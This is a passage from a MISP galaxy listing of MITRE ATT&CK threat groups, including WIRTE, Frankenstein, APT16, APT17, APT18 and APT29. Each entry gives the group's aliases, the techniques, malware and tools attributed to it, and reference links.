uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4504. Table References
Links
https://attack.mitre.org/groups/G0008
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain
https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

WIRTE - G0090

[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019)

The tag is: misp-galaxy:mitre-intrusion-set="WIRTE - G0090"

WIRTE - G0090 is also known as:

WIRTE

View relationships graph

WIRTE - G0090 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4505. Table References
Links
https://attack.mitre.org/groups/G0090
https://lab52.io/blog/wirte-group-attacking-the-middle-east/

Frankenstein - G0101

[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Frankenstein - G0101"

Frankenstein - G0101 is also known as:

Frankenstein

View relationships graph

Frankenstein - G0101 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4506. Table References
Links
https://attack.mitre.org/groups/G0101
https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

PittyTiger - G0011

[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)

The tag is: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011"

PittyTiger - G0011 is also known as:

PittyTiger

View relationships graph

PittyTiger - G0011 has relationships with:

similar: misp-galaxy:threat-actor="Pitty Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Lurid - S0010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4507. Table References
Links
https://attack.mitre.org/groups/G0011
https://airbus-cyber-security.com/the-eye-of-the-tiger/
https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

APT16 - G0023

[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-intrusion-set="APT16 - G0023"

APT16 - G0023 is also known as:

APT16

View relationships graph

APT16 - G0023 has relationships with:

uses: misp-galaxy:mitre-malware="ELMER - S0064" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Server - T1584.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272" with estimative-language:likelihood-probability="almost-certain"

Table 4508. Table References
Links
https://attack.mitre.org/groups/G0023
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

APT17 - G0025

[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)

The tag is: misp-galaxy:mitre-intrusion-set="APT17 - G0025"

APT17 - G0025 is also known as:

APT17
Deputy Dog

View relationships graph

APT17 - G0025 has relationships with:

similar: misp-galaxy:threat-actor="Axiom" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

Table 4509. Table References
Links
https://attack.mitre.org/groups/G0025
https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

APT18 - G0026

[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-intrusion-set="APT18 - G0026"

APT18 - G0026 is also known as:

APT18
TG-0416
Dynamite Panda
Threat Group-0416

View relationships graph

APT18 - G0026 has relationships with:

similar: misp-galaxy:threat-actor="Wekby" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Samurai Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Maverick Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pisloader - S0124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="hcdLoader - S0071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 4510. Table References
Links
https://attack.mitre.org/groups/G0026
http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/
https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop
https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

APT29 - G0016

[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)

In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)

The tag is: misp-galaxy:mitre-intrusion-set="APT29 - G0016"

APT29 - G0016 is also known as:

APT29
NobleBaron
Dark Halo
StellarParticle
NOBELIUM
UNC2452
YTTRIUM
The Dukes
Cozy Bear
CozyDuke

View relationships graph

APT29 - G0016 has relationships with:

similar: misp-galaxy:threat-actor="APT 29" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="meek - S0175" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PinchDuke - S0048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tor - S0183" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CozyCar - S0046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CloudDuke - S0054" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PowerDuke - S0139" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GeminiDuke - S0049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CosmicDuke - S0050" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MiniDuke - S0051" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HAMMERTOSS - S0037" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POSHSPY - S0150" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OnionDuke - S0052" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SeaDuke - S0053" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PolyglotDuke - S0518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RegDuke - S0511" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WellMess - S0514" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WellMail - S0515" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SoreFang - S0516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SUNSPOT - S0562" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Sibot - S0589" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TEARDROP - S0560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Raindrop - S0565" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GoldFinder - S0597" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="GoldMax - S0588" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SUNBURST - S0559" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FatDuke - S0512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Sliver - S0633" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="EnvyScout - S0634" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BoomBox - S0635" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="VaporRage - S0636" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="LiteDuke - S0513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NativeZone - S0637" with estimative-language:likelihood-probability="almost-certain"

Table 4511. Table References
Links
https://attack.mitre.org/groups/G0016
https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/
https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise
https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF
https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
